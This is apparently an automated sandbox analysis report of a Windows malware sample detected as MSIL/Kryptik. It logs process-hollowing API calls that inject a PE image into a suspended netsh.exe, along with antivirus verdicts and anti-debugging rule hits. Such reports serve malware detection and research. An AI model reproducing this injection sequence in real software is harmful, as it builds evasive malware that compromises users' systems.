heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0231d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2780
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0231e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2932
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c70000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
Elastic malicious (moderate confidence)
Cybereason malicious.98aef1
ESET-NOD32 a variant of MSIL/Kryptik.AEKM
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky UDS:DangerousObject.Multi.Generic
ZoneAlarm UDS:DangerousObject.Multi.Generic
Fortinet MSIL/Kryptik.AEKM!tr
BitDefenderTheta Gen:NN.ZemsilF.34264.Sn1@ae72hdn
section {u'size_of_data': u'0x0019e400', u'virtual_address': u'0x00002000', u'entropy': 7.061578024893062, u'name': u'.text', u'virtual_size': u'0x0019e3d1'} entropy 7.06157802489 description A section with a high entropy has been found
entropy 0.960579710145 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\SysWOW64\netsh.exe"
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2932
region_size: 237568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002a8
1 0 0
Time & API Arguments Status Return Repeated

LdrGetDllHandle

 module_name: snxhk.dll
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

 module_name: snxhk.dll
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZERèXƒè ‹ÈƒÀ<‹ÁƒÀ(ÿᐸº´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"šúHuQH"šÏH:QH"šÌH8QHRich9QHPELfñSà  |0Ԑ@ @Œ .textL{| `.rsrcŒ Œ@@
base_address: 0x00400000
process_identifier: 2932
process_handle: 0x000002a8
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2932
process_handle: 0x000002a8
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZERèXƒè ‹ÈƒÀ<‹ÁƒÀ(ÿᐸº´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"šúHuQH"šÏH:QH"šÌH8QHRich9QHPELfñSà  |0Ԑ@ @Œ .textL{| `.rsrcŒ Œ@@
base_address: 0x00400000
process_identifier: 2932
process_handle: 0x000002a8
1 1 0
Process injection Process 2780 called NtSetContextThread to modify thread in remote process 2932
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4314160
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002a4
process_identifier: 2932
1 0 0
Process injection Process 2780 resumed a thread in remote process 2932
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 2932
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2780
1 0 0

NtResumeThread

 thread_handle: 0x00000154
suspend_count: 1
process_identifier: 2780
1 0 0

NtResumeThread

 thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2780
1 0 0

NtResumeThread

 thread_handle: 0x00000234
suspend_count: 1
process_identifier: 2780
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtResumeThread

 thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2780
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtResumeThread

 thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2780
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtSetContextThread

 registers.eip: 1928014724
registers.esp: 2811704
registers.edi: 57035032
registers.eax: 59990016
registers.ebp: 2811748
registers.edx: 125
registers.ebx: 39620424
registers.esi: 56817997
registers.ecx: 39620508
thread_handle: 0x000000e8
process_identifier: 2780
1 0 0

NtResumeThread

 thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 2780
1 0 0

CreateProcessInternalW

 thread_identifier: 2936
thread_handle: 0x000002a4
process_identifier: 2932
current_directory:
filepath: C:\Windows\SysWOW64\netsh.exe
track: 1
command_line: "C:\Windows\SysWOW64\netsh.exe"
filepath_r: C:\Windows\SysWOW64\netsh.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000002a8
1 1 0

NtGetContextThread

 thread_handle: 0x000002a4
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2932
region_size: 237568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002a8
1 0 0

WriteProcessMemory

 buffer: MZERèXƒè ‹ÈƒÀ<‹ÁƒÀ(ÿᐸº´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"šúHuQH"šÏH:QH"šÌH8QHRich9QHPELfñSà  |0Ԑ@ @Œ .textL{| `.rsrcŒ Œ@@
base_address: 0x00400000
process_identifier: 2932
process_handle: 0x000002a8
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 2932
process_handle: 0x000002a8
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00429000
process_identifier: 2932
process_handle: 0x000002a8
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2932
process_handle: 0x000002a8
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4314160
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002a4
process_identifier: 2932
1 0 0

NtResumeThread

 thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 2932
1 0 0